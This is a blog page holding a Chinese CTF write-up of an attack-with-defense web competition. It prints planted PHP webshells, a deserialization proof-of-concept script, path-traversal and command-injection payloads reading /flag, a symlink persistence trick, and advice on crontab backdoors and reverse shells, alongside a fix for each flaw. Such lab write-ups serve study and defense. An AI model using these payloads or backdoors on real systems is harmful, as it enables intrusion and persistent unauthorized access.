<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"m09ic.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="(本文首发于星盟安全公众号,链接:北极星杯AWD-Web-Writeup) 前言祝祖国70周年生日快乐,也祝星盟一周年生日快乐.感谢各位师傅在国庆假期抽出时间参加这次比赛,也感谢负责组织比赛的师傅忙前忙后. 大哥大嫂国庆好!!!">
<meta property="og:type" content="article">
<meta property="og:title" content="北极星杯AWD Writeup">
<meta property="og:url" content="https://m09ic.top/posts/16997/index.html">
<meta property="og:site_name" content="M09ic&#39;s Blog">
<meta property="og:description" content="(本文首发于星盟安全公众号,链接:北极星杯AWD-Web-Writeup) 前言祝祖国70周年生日快乐,也祝星盟一周年生日快乐.感谢各位师傅在国庆假期抽出时间参加这次比赛,也感谢负责组织比赛的师傅忙前忙后. 大哥大嫂国庆好!!!">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://m09ic.top/posts/16997/1.png">
<meta property="article:published_time" content="2019-10-04T07:50:57.000Z">
<meta property="article:modified_time" content="2021-01-04T14:50:56.735Z">
<meta property="article:author" content="M09ic">
<meta property="article:tag" content="Writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://m09ic.top/posts/16997/1.png">

<link rel="canonical" href="https://m09ic.top/posts/16997/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>北极星杯AWD Writeup | M09ic's Blog</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-140303637-1"></script>
    <script>
      if (CONFIG.hostname === location.hostname) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'UA-140303637-1');
      }
    </script>


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?04d80448a6c7bfee29f2e7379ff56865";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="M09ic's Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">M09ic's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">独自行走于莽荒之地</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://m09ic.top/posts/16997/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="M09ic">
      <meta itemprop="description" content="网络安全,编程学习记录的破地方">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="M09ic's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          北极星杯AWD Writeup
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-10-04 15:50:57" itemprop="dateCreated datePublished" datetime="2019-10-04T15:50:57+08:00">2019-10-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-01-04 22:50:56" itemprop="dateModified" datetime="2021-01-04T22:50:56+08:00">2021-01-04</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">网络安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/posts/16997/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/posts/16997/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>(本文首发于星盟安全公众号,链接:<a target="_blank" rel="noopener" href="https://weixin.sogou.com/link?url=dn9a_-gY295K0Rci_xozVXfdMkSQTLW6cwJThYulHEtVjXrGTiVgSzeo9_evQk7_5VddawZp5ST5oaiKpHxlmlqXa8Fplpd9X-AYT8efJLqd3HjPvm5Ogi--XpCmp3p1FHUhJwkRV7i9aeBi2KpxK2c3LarU8cDZSknbf5kXQUJ8A8_jCv3vvByWQLSekv36n-__jjNOQ5XtP7ax8jUAmApx0QokVAEdNH4IggvvmKFftm6lykiDTsEdHSGWGQZgpm-K3rnUF_U89kyxDwoXvg..&type=2&query=%E5%8C%97%E6%9E%81%E6%98%9F%E6%9D%AF%20awd&token=80E801B32D15389AEAEC483650AA175EEA3E0B325E8F35FE&k=29&h=V">北极星杯AWD-Web-Writeup</a>)</p>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>祝祖国70周年生日快乐,也祝星盟一周年生日快乐.感谢各位师傅在国庆假期抽出时间参加这次比赛,也感谢负责组织比赛的师傅忙前忙后.</p>
<p><strong>大哥大嫂国庆好!!!</strong></p>
<a id="more"></a>

<p>先贴上web题目源码:</p>
<p><a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1O-0DDM5CPCh3DtUdAdN3CQ">https://pan.baidu.com/s/1O-0DDM5CPCh3DtUdAdN3CQ</a></p>
<p><em>因为是先上的waf再做的备份,所以看到waf相关的东西师傅们可以无视…</em></p>
<h2 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h2><h3 id="冰蝎后门"><a href="#冰蝎后门" class="headerlink" title="冰蝎后门"></a>冰蝎后门</h3><p>在<code>/pma</code>路径下有个<code>binxie2.0.1.php</code>与<code>\assets\images\yjh.php</code>,密码是pass.</p>
<p>但是因为冰蝎马有个交换aes秘钥,并且流量都通过aes加密,之前没写过冰蝎的批量脚本.并且木马设置的太明显,大部分队伍很快就能发现.因此,除了最开始手动提交了几个,这个后门我们并没有用上.</p>
<p>实际上,到了比赛中后期,还有四五支队伍没有清理这个后门.</p>
<p>修复方案:</p>
<p>删除后门文件</p>
<h3 id="eval后门"><a href="#eval后门" class="headerlink" title="eval后门"></a>eval后门</h3><p>位于<code>\assets\scripts\pass.php</code></p>
<p><code>@eval($_POST[&#39;pass&#39;]);</code></p>
<p>太明显了,直接批量脚本跑就完事了.</p>
<p>修复方案: 删除后门文件</p>
<h3 id="登录处sql注入"><a href="#登录处sql注入" class="headerlink" title="登录处sql注入"></a>登录处sql注入</h3><p>可用万能密码直接登录,也可以直接使用sqlmap.</p>
<p><code>sqlhelper.php</code>目录下可以看到配置文件,</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">private static $host&#x3D;&quot;127.0.0.1&quot;;</span><br><span class="line">private static $user&#x3D;&quot;root&quot;;</span><br><span class="line">private static $pwd&#x3D;&quot;root&quot;;</span><br><span class="line">private static $db&#x3D;&quot;mail&quot;;</span><br></pre></td></tr></table></figure>
<p>数据库dba是root权限,有可能被利用来提权或读文件.</p>
<p>因为找到了更容易利用的点,忘了这个sql注入,所以并没有用上这个点.</p>
<p>修复方案:</p>
<p>转义或过滤单引号</p>
<h3 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h3><p>位于<code>sqlhelper.php</code>文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;un&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;x&#x27;</span>]))&#123;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$male</span>;</span><br><span class="line">    </span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$a</span> = <span class="keyword">$this</span>-&gt;name;</span><br><span class="line">        <span class="variable">$a</span>(<span class="keyword">$this</span>-&gt;male);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">unserialize(<span class="variable">$_POST</span>[<span class="string">&#x27;un&#x27;</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>poc如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests,re</span><br><span class="line"><span class="comment">#url = &quot;http://39.100.119.37:1%s80/sqlhelper.php?x=system(&#x27;cat+/flag&#x27;);&quot;</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">poc</span>(<span class="params">url</span>):</span></span><br><span class="line">    data = &#123;<span class="string">&quot;un&quot;</span>:<span class="string">&#x27;O:1:&quot;A&quot;:2:&#123;s:4:&quot;name&quot;;s:6:&quot;assert&quot;;s:4:&quot;male&quot;;s:16:&quot;eval($_GET[&quot;x&quot;])&quot;;&#125;&#x27;</span>&#125;</span><br><span class="line">    flag = requests.post(url,data=data).text</span><br><span class="line">    flag = re.<span class="built_in">compile</span>(<span class="string">&#x27;flag&#123;.+?&#125;&#x27;</span>).findall(flag)[<span class="number">0</span>]</span><br><span class="line">    <span class="keyword">return</span> flag</span><br></pre></td></tr></table></figure>
<p>get请求:</p>
<p>虽然我们很早就发现了这个点,但是没有在第一时间写出payload,靠着不知道拿队大佬打过来的流量,实现的反打.</p>
<p>修复方案:</p>
<p>删除<code>unserialize($_POST[&#39;un&#39;]);</code>即可</p>
<p>web1我们队只发现了上诉漏洞,流量记录中也没有其他可疑记录,如果师傅们有其他漏洞,欢迎交流</p>
<h2 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h2><h3 id="冰蝎后门-1"><a href="#冰蝎后门-1" class="headerlink" title="冰蝎后门"></a>冰蝎后门</h3><p>位于<code>\icon\pww.php</code>与<code>pass.php</code></p>
<p>利用与修复同web1</p>
<h3 id="eval后门-1"><a href="#eval后门-1" class="headerlink" title="eval后门"></a>eval后门</h3><p>在<code>.\login\index.php</code>文件57行存在eval后门</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;nono&#x27;</span>]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>靠着手速抢先留其他后门,制作软连接后门,<code>ln -s /flag /var/www/html/.config.php</code>,不少队一直没发现,利用到了最后.</p>
<p>修复方案:</p>
<p>删除即可.</p>
<h3 id="任意文件读取"><a href="#任意文件读取" class="headerlink" title="任意文件读取"></a>任意文件读取</h3><p>漏洞位于<code>img.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;img&#x27;</span>];</span><br><span class="line"><span class="variable">$img</span> = file_get_contents(<span class="string">&#x27;images/icon/&#x27;</span>.<span class="variable">$file</span>);</span><br><span class="line"><span class="comment">//使用图片头输出浏览器</span></span><br><span class="line">header(<span class="string">&quot;Content-Type: image/jpeg;text/html; charset=utf-8&quot;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$img</span>;</span><br><span class="line"><span class="keyword">exit</span>;</span><br></pre></td></tr></table></figure>
<p>可以看到<code>file_get_contents</code>函数没有任何过滤,用requests或burpsuite发包读取flag.</p>
<p>payload:<code>http://39.100.119.37:2%s80/img.php?img=../../../../../flag</code></p>
<p>修复方案: </p>
<p>写死$file参数, checkdown也不会检查图片显示正不正确.</p>
<h3 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h3><p>位于<code>\connect.php</code>,82行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;check&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$check</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;check&#x27;</span>];</span><br><span class="line">    <span class="variable">$id</span> = intval(<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>]);</span><br><span class="line">    <span class="variable">$sql</span> = <span class="string">&quot;SELECT host,port from host where id = <span class="subst">$id</span>&quot;</span>;</span><br><span class="line">    <span class="variable">$res</span> = <span class="variable">$helper</span>-&gt;execute_dql(<span class="variable">$sql</span>);</span><br><span class="line">    <span class="variable">$row</span> = <span class="variable">$res</span>-&gt;fetch_assoc();</span><br><span class="line">    <span class="variable">$host</span> = <span class="variable">$row</span>[<span class="string">&#x27;host&#x27;</span>];</span><br><span class="line">    <span class="variable">$port</span> = <span class="variable">$row</span>[<span class="string">&#x27;port&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$check</span>==<span class="string">&#x27;web&#x27;</span>)&#123;</span><br><span class="line">        <span class="variable">$location</span> = <span class="variable">$host</span>.<span class="string">&#x27;:&#x27;</span>.<span class="variable">$port</span>; <span class="comment">// Get the URL from the user.</span></span><br><span class="line">        <span class="variable">$curl</span> = curl_init();</span><br><span class="line">        curl_setopt(<span class="variable">$curl</span>, CURLOPT_URL, <span class="variable">$location</span>); <span class="comment">// Not validating the input. Trusting the location variable</span></span><br><span class="line">        curl_setopt(<span class="variable">$curl</span>, CURLOPT_RETURNTRANSFER, <span class="number">1</span>);</span><br><span class="line">        <span class="variable">$res_web</span> = curl_exec(<span class="variable">$curl</span>);</span><br><span class="line">        curl_close(<span class="variable">$curl</span>);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$check</span> == <span class="string">&#x27;net&#x27;</span>) &#123;</span><br><span class="line">	<span class="variable">$r</span> = exec(<span class="string">&quot;ping -c 1 <span class="subst">$host</span>&quot;</span>);</span><br><span class="line">	...</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br></pre></td></tr></table></figure>
<p>可以看到GET提交$check参数为”net”,再POST提交host参数即可实现命令注入.</p>
<p>payload:<code>;cat /flag&gt;/var/www/html/.config.php</code></p>
<p>web2只发现了这几个漏洞,不过可以肯定存在其他漏洞,在比赛中后期,我们被频繁拿分,但后面有些手忙脚乱没有仔细翻流量.没有实现反打.</p>
<h2 id="web3"><a href="#web3" class="headerlink" title="web3"></a>web3</h2><h3 id="命令注入-1"><a href="#命令注入-1" class="headerlink" title="命令注入"></a>命令注入</h3><p>位于<code>export.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;name&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$name</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">    exec(<span class="string">&quot;tar -cf backup/<span class="subst">$name</span> images/*.jpg&quot;</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;div class=\&quot;alert alert-success\&quot; role=\&quot;alert\&quot;&gt;</span></span><br><span class="line"><span class="string">    导出成功,&lt;a href=&#x27;backup/<span class="subst">$name</span>&#x27;&gt;点击下载&lt;/a&gt;&lt;/div&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>没有任何过滤,$name参数可控,导致命令注入.</p>
<p>payload: post name参数提交:<code>1.tar  /fla*;</code></p>
<p>然后访问<code>site.com/backup/1.tar</code></p>
<p>因为有其他队师傅在批量跑.因此我们就干脆搭顺风车,下载1.tar提交一下.</p>
<p>修复方案:</p>
<p>把name参数写死.</p>
<h3 id="extract后门"><a href="#extract后门" class="headerlink" title="extract后门"></a>extract后门</h3><p>位于<code>\include\config.php</code>与<code>\app\includes\config.php</code>两处,一模一样的后门</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;hello world&#x27;</span>;</span><br><span class="line">extract(<span class="variable">$_REQUEST</span>);</span><br><span class="line">@<span class="variable">$d</span>(<span class="variable">$_POST</span>[c]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>payload: post提交<code>d=assert&amp;c=phpinfo()</code></p>
<p>修复方案:</p>
<p>删除这两个文件.</p>
<p>web3应该也还有其他漏洞,很可惜没有审计出来.</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>很幸运拿到第二名,感谢送的奖品^ ^</p>
<p>总得来说,这次比赛漏洞设置的都比较明显,大部分通过d盾都可以扫出来,流量特征也很明显.</p>
<p>流量审计在题目难度不高的AWD比赛中效果非常显著.能够快速将抓到的payload转化为自动脚本反击,也可以抓不死马的密码搭乘顺风车.</p>
<p>在check机制并不是特别严格的情况下,可以上通防waf,阻断请求或返回flag.如果check机制比较严格,可以替换恶意关键字,不阻断请求.如果没做nat,可以找check机ip设置白名单.</p>
<p>至于其他权限维持的方法,比如软链接,crontab后门,反弹shell,sh后门.尽量把能用的方法都用上.</p>
<p>如果比赛题目的难度不是特别高,通常可以用d盾扫几个主办方预留的后门,只要手速够快,就可以再其他队伍删除后门之前留下各种后门,可以稳住前期优势,这次比赛我们队就在前期通过主办方后门稳居前三.</p>
<p>中后期,自动化脚本在批量利用web123以及pwn2.只可惜权限维持没做好,最后时刻被反超了.</p>
<p>最后膜一下腹黑师傅的W&amp;M战队,最后几轮直接火箭升天,从落后四五百分到领先将近2000分,太强了,强到让我一度怀疑日穿了平台.</p>
<p>也要膜一下小远师傅的黑科技,</p>
<p><img src="1.png" alt="1"></p>
<p>在比赛前准备一个自动备份,上waf,恢复网站的脚本是很有必要的.</p>
<p>也需要一个提交flag,自动化攻击的框架. 推荐一下王一航师傅的 <code>ReverseShellManager</code>,根据自己需求修改后使用,效果还不错.</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>M09ic
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://m09ic.top/posts/16997/" title="北极星杯AWD Writeup">https://m09ic.top/posts/16997/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

        

  <div class="followme">
    <p>欢迎关注我的其它发布渠道</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
        </div>
    </div>
  </div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Writeup/" rel="tag"># Writeup</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/50801/" rel="prev" title="浙江CTF(ZJCTF) Quals Writeup">
      <i class="fa fa-chevron-left"></i> 浙江CTF(ZJCTF) Quals Writeup
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/56679/" rel="next" title="Ogeek Final Writeup">
      Ogeek Final Writeup <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#web1"><span class="nav-number">1.1.</span> <span class="nav-text">web1</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%B0%E8%9D%8E%E5%90%8E%E9%97%A8"><span class="nav-number">1.1.1.</span> <span class="nav-text">冰蝎后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#eval%E5%90%8E%E9%97%A8"><span class="nav-number">1.1.2.</span> <span class="nav-text">eval后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%99%BB%E5%BD%95%E5%A4%84sql%E6%B3%A8%E5%85%A5"><span class="nav-number">1.1.3.</span> <span class="nav-text">登录处sql注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">1.1.4.</span> <span class="nav-text">反序列化</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web2"><span class="nav-number">1.2.</span> <span class="nav-text">web2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%B0%E8%9D%8E%E5%90%8E%E9%97%A8-1"><span class="nav-number">1.2.1.</span> <span class="nav-text">冰蝎后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#eval%E5%90%8E%E9%97%A8-1"><span class="nav-number">1.2.2.</span> <span class="nav-text">eval后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96"><span class="nav-number">1.2.3.</span> <span class="nav-text">任意文件读取</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.4.</span> <span class="nav-text">命令注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web3"><span class="nav-number">1.3.</span> <span class="nav-text">web3</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5-1"><span class="nav-number">1.3.1.</span> <span class="nav-text">命令注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#extract%E5%90%8E%E9%97%A8"><span class="nav-number">1.3.2.</span> <span class="nav-text">extract后门</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.4.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">M09ic</p>
  <div class="site-description" itemprop="description">网络安全,编程学习记录的破地方</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
